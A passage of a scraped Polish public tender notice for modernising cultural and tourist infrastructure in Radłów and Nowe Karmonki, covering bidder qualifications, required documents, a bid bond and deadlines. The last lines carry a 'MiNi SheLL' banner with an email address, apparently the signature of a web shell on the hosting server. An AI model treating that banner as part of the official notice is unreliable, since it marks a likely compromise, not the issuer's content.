zakresie posiadanych uprawnień budowlanych wyznaczonej do pełnienia funkcji kierownika budowy.<br/><br/>2. Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcie gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <br/><br/>3.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. spółki cywilne lub konsorcja). W takim przypadku ustanawiają oni pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/><br/>4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu, natomiast warunki udziału w postępowaniu mogą być spełnione łącznie. <br/><br/>5.	Dopuszcza się zmianę lub rezygnację z podwykonawcy. Jeżeli jednak zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się w celu wykazania spełniania warunków udziału w postępowaniu, wykonawca obowiązany jest wykazać Zamawiającemu, że zaproponowany inny podwykonawca lub wykonawca spełnia je w stopniu nie mniejszym niż Podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.<br/><br/>6.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu,<br/>w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego<br/>części, polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. W związku z powołaniem się na zasoby podmiotów trzecich:<br/><br/>6.1. Wykonawca składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia, o którym mowa w rozdziale XIV ust. 14 ppkt 14.1.2., lub inny adekwatny dokument lub środek dowodowy potwierdzający, że Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów;<br/>6.2. Zamawiający oceni, czy udostępniane Wykonawcy przez podmiot udostępniający zasoby zdolności techniczne lub zawodowe pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy;<br/>6.3. w celu wykazania w stosunku do podmiotów, na zasoby których powołuje się Wykonawca, braku istnienia podstaw wykluczenia oraz spełniania – w zakresie, w jakim powołuje się na ich zasoby – warunków udziału w postępowaniu, Wykonawcy składają oświadczenia i dokumenty wskazane w rozdziale IX, w sposób i w trybie tam określonych;<br/>6.4. jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający zażąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/><br/>7.	Celem wykazania spełnienia warunków udziału w postępowaniu, Wykonawca składa dokumenty wskazane w rozdziale IX, w sposób i w trybie tam określonych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">4.	Zamawiający wezwie Wykonawcę, którego oferta została oceniona najwyżej, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie podmiotowych środków dowodowych aktualnych na dzień ich złożenia – w postaci następujących dokumentów:<br/>4.1. oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 6 do SWZ;<br/>4.2. wskazania co najmniej jednej umowy o roboty budowlane wykonanej w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wraz z podaniem wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których roboty budowlane zostały wykonane oraz załączeniem dowodów potwierdzających, że te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy - w celu potwierdzenia, że Wykonawca wykonał roboty budowlane odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia i posiada doświadczenie w zakresie niezbędnym do należytego wykonania zobowiązań umownych wynikających z udzielenia zamówienia publicznego, na kwotę wynagrodzenia nie niższą niż 800.000,00 zł brutto (zgodnie z załącznikiem nr 5 do SWZ);<br/>4.3. wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego (wskazanie kierownika budowy), wraz z informacjami na temat kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego (zgodnie z załącznikiem nr 4 do SWZ),<br/>4.4. oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu w zakresie<br/>podstaw do wykluczenia określonych w art. 108 ust. 1 pkt 3-6, w art. 109 ust. 1 pkt 1 odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170), w art. 109 ust. 1 pkt 6 i 7 ustawy Pzp (załącznik nr 3 do SWZ). W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia zgodnie z załącznikiem nr 3 do SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. W przypadku korzystania przez Wykonawcę ze zdolności technicznych lub zawodowych podmiotów udostępniających zasoby, Wykonawca przedstawia wraz z oświadczeniem, o którym mowa powyżej, także oświadczenie podmiotu udostępniającego zasoby, o aktualności informacji zawartych w oświadczeniu o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu w zakresie podstaw do wykluczenia określonych w art. 108 ust. 1 pkt 3-6, w art. 109 ust. 1 pkt 1 odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170) oraz w art. 109 ust. 1 pkt 7 ustawy Pzp (załącznik nr 3a do SWZ).<br/><br/>5.	Zamawiający nie będzie wymagać złożenia na wezwanie jakichkolwiek innych podmiotowych środków dowodowych, niż wskazane powyżej.<br/><br/>6.	Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Wykonawcy składają wraz z ofertą oświadczenia o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 ustawy PZP – w zakresie określonym odpowiednio w rozdziale VII i VIII SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia<br/>oraz spełnianie warunków udziału w postępowaniu na dzień składania ofert,<br/>tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki<br/>dowodowe. Oświadczenie składa się na formularzu według wzoru stanowiącego załącznik nr 2 do SWZ pod rygorem nieważności jako dokument elektroniczny podpisany podpisem elektronicznym – w formie elektronicznej (jako dokument<br/>opatrzony kwalifikowanym podpisem elektronicznym osoby uprawnionej /<br/>kwalifikowanymi podpisami elektronicznymi osób uprawnionych do reprezentowania<br/>Wykonawcy) lub w postaci elektronicznej (jako dokument opatrzony podpisem<br/>zaufanym lub podpisem osobistym osoby uprawnionej / podpisami zaufanymi<br/>lub podpisami osobistymi osób uprawnionych do reprezentowania Wykonawcy).<br/><br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców<br/>oświadczenie, o którym mowa w ust. 1, składa każdy z tych Wykonawców. Ponadto w takim wypadku złożyć należy także oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp jako podmiotowy środek dowodowy, którego obowiązek złożenia wynika z ustawy.<br/><br/>3.	W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby Wykonawca przedstawia wraz z własnym oświadczeniem, o którym mowa<br/>w ust. 1, także oświadczenie podmiotu udostępniającego zasoby (podmiotu trzeciego) potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby. Oświadczenie podmiotu trzeciego winno zostać złożone na formularzu według wzoru stanowiącego załącznik nr 2a do SWZ, pod rygorem nieważności jako dokument elektroniczny podpisany podpisem elektronicznym – w formie elektronicznej (jako dokument opatrzony kwalifikowanym podpisem elektronicznym osoby uprawnionej /<br/>kwalifikowanymi podpisami elektronicznymi osób uprawnionych do reprezentowania<br/>podmiotu trzeciego) lub w postaci elektronicznej (jako dokument opatrzony<br/>podpisem zaufanym lub podpisem osobistym osoby uprawnionej / podpisami<br/>zaufanymi lub podpisami osobistymi osób uprawnionych do reprezentowania<br/>podmiotu trzeciego).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium w kwocie: 25.000,00 PLN (słownie: dwadzieścia pięć tysięcy złotych zero groszy).<br/><br/>2.	Wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku formach o których mowa w art. 97 ust. 7 ustawy Pzp:<br/>a) pieniądzu, <br/>b) gwarancjach bankowych, <br/>c) gwarancjach ubezpieczeniowych, <br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2020 r. poz. 299).<br/><br/>3.	Wadium należy wnieść przed upływem terminu składania ofert.<br/>4.	W przypadku wnoszenia wadium w pieniądzu kwotę określoną w ust. 1 należy wpłacić przelewem na rachunek bankowy w Banku Spółdzielczym Zawadzkie numer rachunku: 53 8909 1045 2004 0000 0013 0006 z dopiskiem:<br/>„wadium – postępowanie Nr IZPŚ.271.7.2022 – „Modernizacja infrastruktury kulturalno – turystycznej w Radłowie i Nowych Karmonkach”<br/>Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na wskazanym rachunku bankowym przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>5.	W przypadku wnoszenia wadium w formie gwarancji lub poręczenia przez Wykonawców wspólnie ubiegających się o realizację zamówienia z treści w/w dokumentu powinno jednoznacznie wynikać, że wadium zabezpiecza ofertę składaną wspólnie przez Wykonawców. Tym samym dokument ten powinien identyfikować wszystkich Wykonawców składających ofertę wspólną.<br/>6.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>7.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>8.	Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 ustawy Pzp.<br/>9.	W przypadku wniesienia wadium w formie elektronicznej jego treść nie może zawierać informacji, iż gwarancja wygasa w momencie zwrotu oryginału dokumentu.<br/>10.	Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp zostanie odrzucona.<br/>11.	Okoliczności i zasady zwrotu wadium oraz jego zatrzymania określa art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawcy (np. w ramach spółki cywilnej lub<br/>konsorcjum) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>określone w rozdziale VIII warunki udziału w postępowaniu winien spełniać jeden lub część z tych Wykonawców, lub też<br/>wszyscy ci Wykonawcy wspólnie.<br/>4. W odniesieniu do warunków dotyczących doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane. W kontekście takiej sytuacji Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy (oświadczenie, o którym mowa<br/>w art. 117 ust. 4 ustawy Pzp).<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia odnośnie żadnego z tych Wykonawców<br/>nie mogą istnieć podstawy wykluczenia określone w rozdziale VII, z zastrzeżeniem wyjątków wskazanych w ust. 5-6 tego<br/>rozdziału. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zgodnie ze wzorem umowy stanowiącym załącznik nr 7 do SWZ <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (tzw. zmiany kontraktowe w oparciu o art. 455<br/>ust. 1 pkt 1 ustawy) w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami<br/>zawartymi w załączniku nr 7 do SWZ. tj.:<br/>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną<br/>na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.<br/>2. Strony umowy przewidują możliwość zmiany istotnych postanowień umowy odnośnie:<br/>1) należnego Wykonawcy wynagrodzenia w przypadku wprowadzenia zmian przez ustawodawcę w zakresie stawek<br/>podatku od towarów i usług; przy czym zakres zmiany ograniczony jest do zmiany kwoty podatku VAT;<br/>2) terminu realizacji umowy w przypadku:<br/>a) wystąpienia siły wyższej;<br/>b) wystąpienia szczególnie niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót<br/>budowlanych zgodnie ze sztuką budowlaną i przyjętymi normami;<br/>c) wystąpienia uzasadnionych okoliczności leżących wyłącznie po stronie Zamawiającego, np. konieczność przesunięcia<br/>terminu przekazania terenu budowy, konieczność zmiany tymczasowej organizacji ruchu, zaistniałych<br/>w trakcie realizacji przedmiotu umowy, które utrudniają lub uniemożliwiają prawidłowe i terminowe wykonanie przedmiotu<br/>umowy;<br/>d) konieczności przebudowy uzbrojenia podziemnego nieujawnionego<br/>w dokumentacji projektowej lub w związku z warunkami technicznymi uzyskanymi od gestorów sieci lub nieotrzymaniem<br/>tych warunków w stosownym czasie;<br/>e) niewydania przez uprawniony organ w ustawowym terminie decyzji warunkującej kontynuację i zakończenie robót<br/>budowlanych;<br/>f) wprowadzenia przez Zamawiającego zmian zwiększających bezpieczeństwo<br/>i efektywność organizacji ruchu przy tym, termin może zostać przedłużony<br/>nie więcej niż o czas trwania okoliczności uzasadniających jego zmianę;<br/>3) przyjętych rozwiązań projektowych lub technicznych w przypadku:<br/>a) zmian przepisów prawa lub norm obowiązujących w budownictwie;<br/>b) konieczności przebudowy uzbrojenia podziemnego nieujawnionego<br/>w dokumentacji projektowej lub w związku z warunkami technicznymi uzyskanymi od gestorów sieci lub nieotrzymaniem<br/>tych warunków w stosownym czasie;<br/>c) wprowadzenia zmian w realizacji inwestycji spowodowanych nowymi technologiami i postępem technicznym. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-25 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com